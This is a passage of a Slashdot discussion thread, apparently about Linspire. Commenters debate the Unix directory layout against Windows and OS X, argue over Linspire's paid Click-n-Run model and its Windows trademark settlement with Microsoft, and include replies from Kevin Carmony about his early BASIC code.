      Samba shares [SMB:]
      NFS share [NFS:]

      and so forth.

      OPSYS: contains the usual OS unix-tree, as does PROGS, but they will appear somewhat merged, if someone/something tries to stat /bin/blarb, it will look in both OPSYS:/bin and then PROGS:/bin (and even NFS:mynfs.server.com/local/network/bin if that is added to the "/" assign)

      A program that is started will use its own cwd as a logical PROGDIR: volume, and put PROGDIR: first in its "/" assign. A program can then always find its own binaries as /bin/myplugin.bin (located in PROGDIR:/bin/ seen from the program itself, but located in "PROGS:My Cool Programs/Very Cool Program/bin/" seen from the user and the OS), and a program can always find OPSYS programs like /bin/bash etc via the "/" assign.

      An admin/user can then also decide which paths he/she wants to be added to the "/" assign for the OPSYS and the user, very much like today.

      There are operating systems where all this has been implemented already, so this is nothing new - however, I have yet to see it implemented on a *IX system, which I find highly ironic, since it's on those it would shine the most - really!

    11. Re:Re-tree by VoltageX · · Score: 1

      OK then. Go the OS X way then and hide it all from the user. Linux can still be in /dev, /etc, /proc, /bin and so on but Joe Sixpack doesn't see it.

      It isn't so hard to hide directories. Joe Unix Admin on the other hand can tick a box in the control applet or run a command and see the Linux tree as normal.
      Is that so hard?

      --
      "Anonymous could not immediately be reached for further comment." - International Business Times
    12. Re:Re-tree by DeathOfScythes · · Score: 1

      That is quite handy for new users, but apple doesn't make it particularly easy for those of us who want to access those folders from applications that use the mac file interface. They hide it in two ways, firstly there's a folder called '/.hidden' that contains a list of files to hide, secondly all of the hidden folders have an 'invisible' bit set. The only way I found to unset that is to use XRay.

    13. Re:Re-tree by Chandon+Seldon · · Score: 1

      It makes at least as much sense as the Windows structure.

      "C:\Documents and Settings\Bob Jones\My Documents" vs. "/home/bob"?

      "C:\Windows\System32\etc\hosts" vs "/etc/hosts"?

      --
      -- The act of censorship is always worse than whatever is being censored. Always.
    14. Re:Re-tree by Anonymous Coward · · Score: 0

      No flames from me either. The file system layout sucks *hard* in linux. Freeking crap is all over the place and every "me, too, mommy, look!" distro barfs it up worse. Biggest mongolian cluster fudge of wheel reinventing EVAH.

          Just because it was the "unix way" a generation ago doesn't mean it can't stand a little improvement. And by that I mean recognize hardware is much better now and lose a lot of the shared libraries in exchange for at least some static compiled apps, have a damn APP folder and just be done with it, not 10 of them, and etc.

      And no I don't want to hear from any purists if security bug whatever means you might have to change all these apps instead of one library, that is a MYTH, you follow all the security advisories and see what you really wind up downloading it's mostly the whole apps get changed anyway 99% of the time.

      And with virtualization right around the corner in a large way the point will become pretty much moot, major apps are going to be running in their own total space *sometime soon*.

      As to Linspire, generally speaking, near as I can see they are "guilty" of trying to make a desktop that works out of the box without massive hoop jumping and gets preinstalled in vendors machines. And they pass their code improvements upstream and sideways. And they cut regular checks to devs. And if you look you can still find their latest for freebies, all except CNR access, and even that is ridiculously cheap. I have a 5.0 disk that was downloaded and burnt. Seemed free and Free enough to me. I know enough to alter repositories or just pay them if I want to, either way works for upgrading. GUI-check, regular ole KDE. CLI-check, there, works. Let's look at the Kernel..ooh, says "Linux"

      Again, how is this wrong?

      IMO, it's actually in the top 5 in terms of functionality and ease of use. It's a decent linux distro as those things go.

    15. Re:Re-tree by helmespc · · Score: 1

      Well... I agree to a point.... the Windows directory sucks... and the Docs and Settings directory sucks.... but C:\Program Files rocks... its simple... everything goes there if you want it to... i don't like the mounting of drives in linux.... you can mount them where-ever you want... which is kind of cool, but its easier to just see C: D: E: whatever... I don't really care for either organization, its hard to keep things from getting messy...

    16. Re:Re-tree by hackstraw · · Score: 1

      I actually agree... the Linux/Unix file tree is confusing and gives the impression of being unorganized. I find it difficult to determine where things exist on my Linux machine as an advanced user, I can only imagine how it looks to a novice. A lot can be done to Linux to add usability for less advances users while keeping the options open for experts... I'd like to see even more strides made toward usability in future releases.

      Maybe I'm just used to it, but it makes sense to me. Sure there are exceptions, but its not bad. I _LOVE_ the concept of /usr/local, because it makes things clear that things installed there are 3rd party or upgraded/different versions of system software. For example, I have /usr/local/bin/perl on Solaris systems, even though there is a /usr/bin/perl. Why? One is an Oracle server that is 64bit, and the Solaris perl will is 32bit and DBI will not work unless in 64bit mode. Also, Solaris perl is compiled with Sun's cc, and some 3rd party perl modules will not compile, or at least not as easily as using gcc. I also have /usr/local/bin/python on some systems because it is newer than the /usr/bin one. My beef with /usr/local is that so many distros and/or commercial UNIXes do not always put the /usr/local/bin in the path, and/or they do not do shared libraries out of the box correctly. The rise of /opt is completely redundant in my opinion.

      To determine where something is, provided you know the name of it, locate is very helpful.

      Someone suggested earlier that /dev and /proc and whatnot should be hidden from the users. Well, OS X does that via the finder. It does not show /usr, /opt/, /dev, /etc, etc. But they are there, and they work as expected from the command line. That stuff cannot move. Its there until the end of time, like it or not. They are just names, and if OS X was able to add an abstraction for simplicity for the average user, then I would guess that anybody could do that as well.

      Regarding Linspire, the only thing I see that is unique about it is the click and run thing. They are the only UNIX/LInux whatever that I know of that seems to have a working or easy way to install applications. Supposedly, it even works! However, it will not work for anything besides the available stock Linspire applications. I've never used or seen Linspire in action, so I don't know the details, only what I've read. I would not recommend Linux to any "normal" person.

    17. Re:Re-tree by hackstraw · · Score: 1

      I would say that root is a place that users never need to go into.

      ls: /root: Permission denied

      Also, there is nothing typically interesting in there. I'm an admin and I don't even go in there much.

    18. Re:Re-tree by giorgosts · · Score: 1

      Unfortunately this would be true if things just worked in Linux world. You have to know where roots home is so you can land debs or rpms or fix dependencies. you have to know where firefox or java (which?) or azureus is because they don't work with each other out of the box. (In fact if you ask somebody outside of the free software world they would say that the greatest disadvantage of Linux apps is that they are not interoperable. Most of Linux users are either computer professionals or computer hobbyists, so they don't mind fixing things. But for those that are not willing to spend an entire day to figure out why e.g. foreign keyboards are not working on KDE 3.5.1 (kubuntu default), Linspire is a good solution. They pay their subscription and software can be installed in a click. And they don't care less if firefox is under /opt or under /usr/lib

    19. Re:Re-tree by Eideewt · · Score: 1

      I didn't mean /root, I meant the root directory, as in "/", and its subdirectories (aside from the user's home dir).

    20. Re:Re-tree by h3 · · Score: 1

      >C:\Program Files rock

      and

      >you can mount them where-ever you want... which is kind of cool, but its easier to just see C: D: E: whatever

      Please stay with Windows.

    21. Re:Re-tree by Eideewt · · Score: 1

      Yes. Linux distros, in their current state, force users to become administrators more often than I'd like. Obviously you have to do that to install software, but that should ideally involve nothing but a package manager.

    22. Re:Re-tree by Anonymous Coward · · Score: 0

      In fact if you ask somebody outside of the free software world they would say that the greatest disadvantage of Linux apps is that they are not interoperable.

      I strongly agree.

    23. Re:Re-tree by timmyf2371 · · Score: 1

      C:\Program Files does make sense though.. it perfectly describes what's in there. Whereas something like /usr/bin like you'd use in Linux, it doesn't really describe what's in there. I've dabbled with Linux over the past few years quite regularly and although I know the file structure and where files/apps should go, i don't understand *why* an application is stored in a directory named "bin", nor "bin" is in /usr.

      --

      Backup not found: (A)bort (R)etry (P)anic
    24. Re:Re-tree by vadim_t · · Score: 1

      Unix directory layout basics: /bin: Binaries needed to boot the system. /lib: Libraries needed to boot the system. /etc: Config files /usr: Stuff for use after booting the system /usr/bin: See above

      Why is it that way? /usr can be located on NFS (network). You can't mount NFS without going through some minimal boot process where you start the network, get an IP address from DHCP, etc. You also need the mount program. All that is in /bin.

      This is all meaningless for a normal user, but really handy for corporate systems. Got 200 machines? Why spend money on disk space when they can all mount it from the network and get all upgraded at once?

      Why is stuff in say, /usr/bin/perl instead /programs/perl/perl? Because then the PATH would be awfully long, and each time you typed "perl" the system would need to search a LONG list of possible places where it could be. GUIs don't care about that because every icon simply links to the full path, but command line interfaces don't work that way.

    25. Re:Re-tree by Chandon+Seldon · · Score: 1

      It's not your responsibility to keep things from getting messy - that's the responsibility of the package manager.

      Under either Windows or Linux, when you look at the root filesystem you see a bunch of implementation-detail crap that is completely irrelevent to you as a user. Both systems promote you never looking there - Windows goes so far as to hide stuff from you in the file manager.

      From an actual user perspective, the two are exactly the same: You have your home folder, your desktop folder, some external disk drives that automount or autoplay, and a bunch of system files that you shouldn't be messing with.

      --
      -- The act of censorship is always worse than whatever is being censored. Always.
  7. Seems to me... by Otter · · Score: 5, Insightful

    My impression is that Lindows/Linspire has always been viewed as outside the world of "real Linux" because:

    1) None of the ultra-user-friendly commercial distros have ever really caught on with the Linux enthusiast community.

    2) Linspire's business plan has alwasy been based on charging users for installing sofware, something that is free everywhere else in the Linux world.

    3) As #2 illustrates, there's always been something sleazy about Linspire. They appeared, making ludicrous claims about Windows compatability, stepping on Microsoft's trademark while prominently advertising rebadged KDE apps as their own, and they've been like that ever since. They may not do anything wrong but it's always ... off.

    1. Re:Seems to me... by tktk · · Score: 5, Funny
      3) As #2 illustrates, there's always been something sleazy about Linspire. They appeared, making ludicrous claims about Windows compatability, stepping on Microsoft's trademark while prominently advertising rebadged KDE apps as their own, and they've been like that ever since. They may not do anything wrong but it's always ... off.

      So...you're saying it's the used-car saleman of the linux world?

    2. Re:Seems to me... by MichaelSmith · · Score: 1
      stepping on Microsoft's trademark

      Microsoft won in the end but I don't believe they had moral ownership of the word "windows". X was there before MS windows.

    3. Re:Seems to me... by Anonymous Coward · · Score: 0

      1) None of the ultra-user-friendly commercial distros have ever really caught on with the Linux enthusiast community.

      It's not worth doing unless it's difficult and eats up a weekend. This proves that Linux users have Aspergers because Linux requires the complete attention and valuable time dicking around with libraries rather than having it "just work".

      Of course Linux users deride things like OSX and Apple calling their computers gay and announcing BSD's death.

    4. Re:Seems to me... by One+Louder · · Score: 4, Informative
      Actually, Microsoft didn't win - when it was clear from some of the judge's rulings that they were about to lose the "Windows" trademark in the United States on the basis of genericness, they decided to buy themselves out of the litigation they initiated by paying Lindows/Linspire $20 million.

      Technically it was a settlement, but it's rare that the plaintiff pays off the defendant in order to get out of a case.

    5. Re:Seems to me... by Anonymous Coward · · Score: 0

      Actually, MS Windows started before X. X was begun in 1984, but X11 wasn't released until late 1986. MS Windows 1.0 came out in late 1985, but work had begun in 1983 (or maybe earlier).

      Also, it's not "X Windows". It's either "X Windowing System" or "X11" or just "X". "X Windows" was a name created by analogy with "Microsoft Windows".

    6. Re:Seems to me... by Anonymous Coward · · Score: 0

      2) Linspire's business plan has alwasy been based on charging users for installing sofware, something that is free everywhere else in the Linux world.

      I am so sick and tired of hearing this broken record. I don't use Linspire but this phrase is worn out. They are charging not for the software but for making sure when you install it, the software will just WORK with everything else and keeping it in their warehouse with all the other software that will work. They have taken the pain in the ass part of installing software on Linux away. That is what the charge is for. If you have never had a pain in the ass installing software on Linux let alone finding a specific app then I want what your smokin.

    7. Re:Seems to me... by MichaelSmith · · Score: 2, Funny
      decided to buy themselves out of the litigation they initiated by paying Lindows/Linspire $20 million.

      I didn't know that. I am off now to make up my own "Windows" trademark. I can feel retirement coming on.

    8. Re:Seems to me... by Trepalium · · Score: 1

      It's not quite that clear cut. Microsoft filed lawsuits in several other countries shortly after they realised that they might very well risk losing their trademark in the U.S. if they continued with the lawsuit. I believe they did succeed in getting the name Lindows banned in Finland, Sweden and in the Netherlands, which forced the name change. A rotten tactic used against a slimy company...

      --
      I used up all my sick days, so I'm calling in dead.
    9. Re:Seems to me... by Anonymous Coward · · Score: 0

      If you have never had a pain in the ass installing software on Linux let alone finding a specific app then I want what your smokin.

      Sure, you can get some here.

    10. Re:Seems to me... by One+Louder · · Score: 2, Informative

      They got preliminary injunctions in some countries (in some case without Lindows even being notified in advance of the hearing), but did not prevail in any actual trial in any country. It is quite likely they would have won the cases in at least some of them, but they would have been hollow victories if they lost in the US and other English-speaking countries. It was clearly worth $20 million to them to not find out.

    11. Re:Seems to me... by kimvette · · Score: 1

      1. OS X and macs aren't gay. The folks who chose the color schemes for them might be though! (kidding, I'm KIDDING. Relax)

      2. Ubuntu "Just works" - Mandriva "Just works" - SuSE "Just works"

      Want to "dick around with libraries?" Choose Fedora, Slackware, or an older Debian derivative.

      With 300 distributions it's easy to make the statement you did, but I just pointed you at several which prove the opposite can be true as well.

      --
      The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
    12. Re:Seems to me... by Liam+Slider · · Score: 1
      1) None of the ultra-user-friendly commercial distros have ever really caught on with the Linux enthusiast community.
      Oh you mean like Mandriva, or Mepis, or Ubuntu....wait, there are pretty popular amoung Linux users to my knowledge, unless they are running supercomputers or bigass servers.

      2) Linspire's business plan has alwasy been based on charging users for installing sofware, something that is free everywhere else in the Linux world.

      3) As #2 illustrates, there's always been something sleazy about Linspire. They appeared, making ludicrous claims about Windows compatability, stepping on Microsoft's trademark while prominently advertising rebadged KDE apps as their own, and they've been like that ever since. They may not do anything wrong but it's always ... off.

      It's not just OSS applications being offered as pay applications, heck....technically there's nothing wrong with that, in fact many distro companies find some way of making OSS pay (premium distros on disk for example). What's sleezy are things like...their anti-virus software, when Linux hasn't had a virus problem aside from little proof-of-concept viruses and those rare big server software worms...furthermore their anti-virus software is designed to mainly protect against Windows viruses. Seems like selling a product to gullable former Windows users who think their systems must have anti-virus software.
    13. Re:Seems to me... by r1_97 · · Score: 1

      "there's always been something sleazy about Linspire"

      Not so. They are up front about being a "for profit" business. The charge for their click and run library is how they survive. Their business plan/market is directed to non techi Windows convertees to Linux. I see nothing sleazy about charging for simplicity and convenience.

    14. Re:Seems to me... by Anonymous Coward · · Score: 0

      yhbt yhl lol

    15. Re:Seems to me... by caudron · · Score: 1

      Linspire's business plan has alwasy been based on charging users for installing sofware, something that is free everywhere else in the Linux world.

      Linspire charges to make it easy for people who don't know linux to install software. In the business world this is called "Value Adding". They sell ease-of-use and they've never hidden that. They do not prevent you from eskewing their Click-n-Run server for apt-get, which works perfectly fine by all accounts.

      In short, either you've never really used Linspire (because then you'd know that apt-get works just fine) or you have used it and have an unstated purpose behind your comment that drives you to misinform the reader. Either way, the comment you made is disingenious (a nicer word for "sleazy").

      I sound harsh, but honestly, I'm tired of ill-informed, gut reactions polluting the commentary. It just gets old. Whatever happened to good old fashioned "knowing what the hell you're talking about or shutting the hell up"? I miss that.

      I personally prefer Ubuntu over Linspire, but that reflects my preference for Gnome and for community-based distros, not my dislike for Linspire or anything they do. Linspire's target audience is not me, becuase I'm too damn cheap to pay for a monthly/yearly service (I don't even have cable!), which again says nothing about Linspire but plenty about me.

      Tom Caudron
      http://tom.digitalelite.com/linux.html

      --
      -Tom
    16. Re:Seems to me... by Mistshadow2k4 · · Score: 2, Insightful

      That's because the fact that Lindows was using the Windows name was much clearer in the languages of those countries. They have their own words for application windows and none of them are "windows". But Windows the OS was still called Windows, and Lindows was also called Lindows. It would be like someone here starting a company and calling it "Reddish Hat".

      --
      I dream of a better world... one in which chickens can cross roads without their motives being questioned.
    17. Re:Seems to me... by Mistshadow2k4 · · Score: 1

      "If you have never had a pain in the ass installing software on Linux let alone finding a specific app then I want what your smokin."

      1. Apt-get (yast, yum, whatever your distro has)
      2. I follow the instructions if it's not in the apt repositories
      3. If there are no instructions I don't install it -- seems a bit dodgy

      --
      I dream of a better world... one in which chickens can cross roads without their motives being questioned.
    18. Re:Seems to me... by Mistshadow2k4 · · Score: 1

      "They do not prevent you from eskewing their Click-n-Run server for apt-get, which works perfectly fine by all accounts."

      Yes they do. When I was new to Linux I downloaded and installed Lindows. I read a tutorial on how to use apt (it was quite accurate, I know that now) and Lindows immediately broke. It locked up so that I had to reboot and then went into a kernel panic. What was I trying to install? The Gimp. I've read numberous posts from people who had the same experience at Distrowatch, LinuxQuestions.org, various other forums and on IRC.

      "Whatever happened to good old fashioned "knowing what the hell you're talking about or shutting the hell up"? "

      I do know what I'm talking about. Sorry, but you're clearly the one who doesn't know what he's talking about on that particular score. People who live in glass houses.... get embarassed a lot.

      --
      I dream of a better world... one in which chickens can cross roads without their motives being questioned.
    19. Re:Seems to me... by caudron · · Score: 1

      It locked up so that I had to reboot and then went into a kernel panic.

      I'll accept at face value that you may have legitimately tried it and found it lacking, but it's worth noting that you say you were new to Linux, probably a bit pissed that it didn't work as expected, and that impression has carried with you, whether it is justified or not.

      I had no trouble with apt on Linspire. I know others who had no trouble as well. More to your point, here's the ExtremeTech review of Linspire where they cracked it open and installed Gimp using apt right away, no muss-no fuss:

      http://www.extremetech.com/article2/0,1697,1151523 ,00.asp

      I'm willing to admit I may have been wrong about your previous post. Sounds like you did try it. I jumped the gun on that. Sorry. But rememeber that at the time you were new to linux and probably glossed over bits you shouldn't have glossed over or something like that. It's a great case-in-point for just what we are talking about. If you wanted to use Linux without all that trouble, Linspire offers a for-pay alternative. Note that Click-n-Run isn't based on apt anymore (I believe it was way back) so they could quite easily and legally remove those utilites. They didn't. That tells me they aren't trying to lock you into their service plan, but rather trusting that you might just like it if you try it. I still don't see that as shady.

      Tom Caudron
      http://tom.digitalelite.com/linux.html

      --
      -Tom
    20. Re:Seems to me... by Knuckles · · Score: 1

      stepping on Microsoft's trademark

      You know, I actually like that somewhat. Not because of "sticking it to MS", but because part of the settlement was that MS gave them the right to distribute windows codecs. And I just have to think that this was Linspire's plan all along.

      --
      "When I first heard Daydream Nation it quite frankly scared the living shit out of me." -- Matthew Stearns
    21. Re:Seems to me... by Otter · · Score: 1
      Oh you mean like Mandriva, or Mepis, or Ubuntu...

      No, I mean Lycoris and the other distros like it that emerged around the same time as Lindows. The ones you mention are aimed at more knowledgeable users.

    22. Re:Seems to me... by Liam+Slider · · Score: 1

      I don't know what planet you come from, but Mandriva has it's origins as a distro designed specifically as an easy to use distribution for the home desktop. And Mepis is incredibly easy, my grandfather uses Mepis, and he's as computer illiterate as they come.

  8. Gnu/Linux for some people by jc87 · · Score: 3, Interesting

    I have read in the past some of this guy posts at Ubuntu forums (yes he sometimes open/reply threads there) and let me say he raises some good questions in several areas, in general i would say he manages to perfectly justify making a distro for dumb/proprietary human beings and recognizing Linspire is not a perfect distro ,neither one destined to every single person out there.

    Kudos for him at least for being modest and realistic.

    Off course i will never use Linspire , Ubuntu plus a extra repos to the sources.list works fine for me.

    --
    def greetings(x): return {'friend': 'Howdy', 'enemy': 'Dye [sic]'}.get(x, 'g0 4w4y, l4m0r')
  9. Secret shake by basneder · · Score: 5, Funny

    "Some people seem to think that Linux is a secret club, where you have to pay your dues before you can learn the secret handshake and run it."

    Dude, dont even mention the Secret Shake! It's supposed to be a secret.

    1. Re:Secret shake by Anonymous Coward · · Score: 0

      I run gentoo. Therefore I don't have a secret shake. It would take way to long to compile to be practical.

    2. Re:Secret shake by HermanAB · · Score: 1

      Heck, people will never hire me due to my inane posts on Sloshdat, but in reality I am managing 5 FreeBSD, 2 RedHat, 6 Fedora, 1 Ubuntu, 1 Mac and 9 Mandriva Linux boxes, plus the usual zoo of Windows machines...

      --
      Oh well, what the hell...
    3. Re:Secret shake by Anonymous Coward · · Score: 0

      Please go fuck yourself with a big broom you dumb broad. Stop it with the job spam. This is a discussion forum, not a job site.

    4. Re:Secret shake by sharkey · · Score: 1

      The first rule of Penguin Club is you don't talk about Penguin Club.

      --

      --
      "Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
    5. Re:Secret shake by marcosdumay · · Score: 1

      The sad part is that those people are right. There is a secret shake. People must be able to get it installed on their computer (even if they want to buy a computer with Linux, it is still hard), and must learn which programs do what.

      Those are two very big problems, that make people unable to use Linux, because they simply can't touch it or because they feel alien on it and don't know what to do. And the bad news is that those problems won't go away, doesn't matter how well we make the system.

    6. Re:Secret shake by basneder · · Score: 0

      "Can I just insert about how great these comments are?"

      Yeah sure, insert away! I just hope you'll give me the same privilege :)

  10. consumer reports... by wpegden · · Score: 3, Informative

    didn't like lindows at all... they reviewed the Walmart Lindows pcs. If you have a CR subscription (or know someone who does) it's a good article to read from the standpoint of understanding what still stands in the way of mainstream acceptance of these distros.

    1. Re:consumer reports... by etymxris · · Score: 1

      But to be fair that was nearly three years ago.

  11. The biggest problem of Linux desktop adaption by zerojoker · · Score: 1, Insightful

    is not usability or hardware support or people having trouble installing linux. The big problem that somehow noone really figures is the lack of applications. The lack of commercial applications, especially.
    There are a lot of kinds of applications where OpenSource works great. "Standard" stuff like mail clients etc. But the more specific an application gets the more it is likely that it is commerically developed. Photoshop, Games, Autocad, Dreamweaver etc. etc. And even then there are some issues concerning application deployment, especially if the source is not available...

    1. Re:The biggest problem of Linux desktop adaption by Anonymous Coward · · Score: 0

      Do we really need an explanation of Why Linux Isn't Ready For My^WThe Desktop in every article that remotely touches on Linux usability?

    2. Re:The biggest problem of Linux desktop adaption by Anonymous Coward · · Score: 0

      Things like Photoshop/Games/Autocad/Dreamweaver etc have trouble INSTALLING and RUNNING on windows, little alone trying to get them to run in linux.

    3. Re:The biggest problem of Linux desktop adaption by Anonymous Coward · · Score: 0
      • Photoshop: The GIMP - how many times does this need to be said, the interface is slightly different but the gimp has most of the features of photoshop plus a few of its own.
        Why don't I do the rest of the main Adobe stuff while I'm at it:

      • Games: Cedega - but maybe you'd be better off using a console (not as in bash you blockhead) as they're cheap and while piracy for them is a bit harder its doable if you're commited.
      • Autocad: a quick search reveals two commercial solutions LinuxCAD and VariCAD and a guide to getting AutoDesk's Autocad running under wine
      • Dreamweaver: NVU, Amaya, hell even fckEditor or, if you're hardcore then vi(e)macs.
    4. Re:The biggest problem of Linux desktop adaption by kiddygrinder · · Score: 1

      For me it's not lack of apps as I only use OSS software on windows (I'm cutting back on gaming to do more coding lately anyways) it's just that everything is that little bit harder. After 30 min of screwing around trying to get something to work i just go "To hell with it" and reboot into windows so i can get some work done.

      --
      This is a joke. I am joking. Joke joke joke.
    5. Re:The biggest problem of Linux desktop adaption by Jussi+K.+Kojootti · · Score: 1

      I'd say that has a lot to do with what you're accustomed to and what your workflow is like, not with linux being more difficult. As a counterpoint to yours, I can tell you that I dread the times I have to use a Windows machine, because my productivity always drops (by a small, but noticeable amount) and I get irritated as hell since I can't do things my way...

  12. Carmony is great by caffeination · · Score: 5, Interesting

    Seriously, Carmony really seems like a decent guy. Listen to him, you'll see what I mean. The Slashdot smart asses usually crap all over Linspire's quality, security, morality, business model, and so on and so on, but give the guy a chance, he's not all bad.

    1. Re:Carmony is great by Anonymous Coward · · Score: 0

      Well, that's not on account of Carmony.

      It's more on account of the clown that founded the company.

    2. Re:Carmony is great by Klowner · · Score: 1

      Obviously you've never dealt with him (or Robertson) personally.

    3. Re:Carmony is great by swillden · · Score: 2, Interesting

      Seriously, Carmony really seems like a decent guy.

      Yeah, he probably is, just keep him away from the keyboard.

      My first job out of college (before I'd graduated, really) was working for a small Point-of-Sale software company that Carmony founded. I spent nearly two years there working on a POS system that he had written. What an unbelievable mess. After I'd been in the code for a couple of weeks, the engineering dept. manager mentioned to me that Carmony had hacked the whole thing in a few months of all-nighters, expecting me to be impressed, or at least surprised. My response was "Ah ha! So *that* explains it".

      I guess I am impressed that the software ran, in spite of being a massive spaghetti bowl.

      Another app that Carmony had written (the one that started the company) was written BASIC. Whether it was true or not I don't know, but Carmony had the idea that the interpreter ran significantly slower and/or consumed significantly more memory (don't recall which) if there was "unnecessary" whitespace in the code. So he removed it. And I don't mean just unnecessary tabs and spaces, I mean all whitespace, including line breaks. Seriously, the bulk of this 70 kloc program consisted of files full of code "blocks" -- solid masses of characters ~78 characters wide and hundreds of lines long. Luckily line numbers were used for goto targets and line numbers had to start at the beginning of a line.

      Unbelievable. When I worked there, the programmers working on that project had just switched to Visual BASIC (did you know you could write DOS programs with it?) which compiled to p-code, so they were finally able to laboriously unwind those massive blocks of code.

      When I asked the lead programmer on that project why Carmony hadn't just written a whitespace stripper so that his code could contain whitespace but he could strip it for performance for "release", he answered that nobody had thought of that until much later.

      All of that said, everyone I knew there that had worked there when Carmony ran the company remembered those days very fondly. Carmony was apparently a lot of fun to work with and a nice guy as well as being a pretty brilliant coder -- as long as no one ever had to maintain the code, including him. The consensus was that he'd cashed out and left the company to escape the legacy of all the horrid old code he'd written, leaving it to poor schmucks like me.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    4. Re:Carmony is great by kimvette · · Score: 1
      The Slashdot smart asses usually crap all over Linspire's quality, security, morality, business model, and so on


      Of course, because:
        "All software wants to be free" (in which case you end up with The Gimp instead of Photoshop. The Gimp is nice, unless you've actually bothered trying Photoshop)
        "morality" (e.g., charging for Linux) - OK, so who is going to keep a roof over your head, food on your table, and pay for yor next shiny? A welfare check? There is certainly room for commercial software. Exhibit a: Adobe CS2; were it to be released for Linux, I'd buy it. Also, the GPL specifically allows charging for GPL-licensed software. What is immoral, unethical, or illegal about it? Answer (for those who don't get it): Not a thing.
        "Linspire's Security" - if they have indeed removed the "default user is root" factor, then Linspire is probably just as secure as any other distribution
        "business model" see morality, all software wants to be free, etc.

      Would I personally use Linspire? Not bloody likely.

      Would I recommend it to novices who just want to surf the web, watch DVDs, play a few games, and instant message friends? Absolutely.
      --
      The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
    5. Re:Carmony is great by swillden · · Score: 1

      The Gimp is nice, unless you've actually bothered trying Photoshop

      I used Photoshop for years before trying the GIMP. I prefer the GIMP.

      I agree with the rest of your post, though.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    6. Re:Carmony is great by Anonymous Coward · · Score: 0

      In my opinion Carmony is an ass hat. I saw him in action at mp3.com, I've seen him in action at Linspire, I've even traded a couple emails with him. He's just like Michael. A bit on the sleezy salesman side.

    7. Re:Carmony is great by gui_tarzan2000 · · Score: 1
      by Anonymous Coward on Friday April 07, @08:33PM (#15088931) "In my opinion Carmony is an ass hat. I saw him in action at mp3.com, I've seen him in action at Linspire, I've even traded a couple emails with him. He's just like Michael. A bit on the sleezy salesman side."

      Maybe he's the nice guy and you're the "ass hat"? I've dealt with him a few times and he's always been helpful and very nice. Sleezy? Heh... you're the one making claims like that and posting as an A/C. Real classy.

      --
      Have you hugged your penguin today?
    8. Re:Carmony is great by christian.einfeldt · · Score: 2, Informative

      I have dealt with both Michael Robertson and Kevin Carmony personally. I find them both likeable, pleasant, intelligent, honest and articulate. I personally don't understand much of the disdain for Linspire or Robertson or Carmony. Of course, no one is really a saint, and no one can be liked by everyone. But my personal experience with these guys is that they are decent, and most important to me personally, they do care about freedom in cyberspace.

    9. Re:Carmony is great by SirSlud · · Score: 1

      Welcome to programming. Your whole experience sounds pretty normal, given that most programmers who work on other peoples code have MAJOR hindsight is 20/20 advantage.

      Still, quite amusing. :)

      --
      "Old man yells at systemd"
    10. Re:Carmony is great by Kevin+Carmony · · Score: 2, Interesting

      Nor have you ever met me. The only intereaction I had with you was when we used some of your art in a Linux tutorial, not knowing it wasn't GPL, and when you coplained, we promptly removed it. You really should GPL your stuff. =) Kevin

    11. Re:Carmony is great by Kevin+Carmony · · Score: 4, Informative

      LOL! Ah, a blast from my programming past (a very short-lived past!). But...let's put this in perspective though...that code was written almost 25 years ago!!! There weren't even hard drives when I hacked that code. It was put together on the very original IBM PC with 64K of memory and floppy drives. So, yes, duh, of course it was written in Basic, about the only thing you could hack with on those original PC's. My degree is in Business, and the only formal training I ever had was DP 101 in college. I've never professed to be a coder. But, that code that I hacked was used by 25% of all video rental stores to check customers in and out in its day. I turned it into a very substantial business, which I later sold for a great deal, and that business is still around today, 20 plus years later! How many of you can say that? =) Kevin Carmony

    12. Re:Carmony is great by Kevin+Carmony · · Score: 2, Interesting

      I was only at MP3.com for 3 months, so my guess is this is someone who has in fact never met me. Guess we'll never know. (They don't call them Anonymous "Cowards" for nothing. =) Kevin

    13. Re:Carmony is great by Anonymous Coward · · Score: 0

      I'd be careful with the LOLs, I think he's fixing to crucify you.

      And yes, I am joking, or am I?

    14. Re:Carmony is great by grammar+fascist · · Score: 1

      That was awesome.

      --
      I got my Linux laptop at System76.
    15. Re:Carmony is great by Morgaine · · Score: 1

      Very nicely put, Kevin. I shouldn't worry about that comment from two decades ago. Some people are like that.

      Re the article, I'm a keen Gentoo user and highly appreciative of the degree of control it gives me, which probably comes close to being the exact opposite of a Linspire target user. Nevertheless, even I appreciate that the vast majority of computer users have either no desire or ability or time to get involved in technical issues. And on top of that, even technical users sometimes want appliances that "just work".

      So don't get worked up at adverse comments from the Linux community, as long as you always do the "right thing" of course and respect the GPL and feed your own value back as well.

      And especially ignore criticisms from Slashdot. This forum lost its technical credentials long ago, and is now largely populated by religious zealots, fanboys of one thing or another, plus technical wannabes with near zero background but plenty of opinion. Just treat it as a random fun forum about slightly technical topics. It works fine as that. :P

      --
      "The question of whether machines can think is no more interesting than [] whether submarines can swim" - Dijkstra
    16. Re:Carmony is great by Kevin+Carmony · · Score: 1

      Well said on all counts! Thank you. Kevin

    17. Re:Carmony is great by Klowner · · Score: 1

      Indeed, I haven't met you, you very well may be a nice guy. I'm just a bit bitter from that ordeal, that was a very non-fun few days for me.

      That aside, Linspire's common practice of re-branding GPL'ed software has always irked me though, and continues to do so.

    18. Re:Carmony is great by Kevin+Carmony · · Score: 1

      Linspire open sources EVERY SINGLE SPECK of art, icons, wallpaper, etc. that we produce. We even sponsor sites that share that art (KDE-look, etc.). Shame you can't do the same. As for rebranding GPL code, 1) you obviously don't understand what Linspire does and does not do (the only "rebranding" we do is giving software friendly names that consumers will understand, for example we call "GAIM" the friendlier name, that consumers will understand of "Instant Messenger, Powered by GAIM."), and 2) even if we did (which we don't), that's sort of the idea of GPL, that code can be used by others. We WELCOME people using our code, art, icons, etc. I think it's a shame you don't do the same. Many people use our themes, icons, etc. and never give us credit. Do we cry about it? Hardly. We are flattered, pleased and applaud it. Here are the MILLIONS of dollars Linspire has contributed in code to open source: http://linspire.com/opensource And your contribution? Why not GPL YOUR work??? Kevin

    19. Re:Carmony is great by swillden · · Score: 1

      My degree is in Business, and the only formal training I ever had was DP 101 in college. I've never professed to be a coder. But, that code that I hacked was used by 25% of all video rental stores to check customers in and out in its day. I turned it into a very substantial business, which I later sold for a great deal, and that business is still around today, 20 plus years later! How many of you can say that? =)

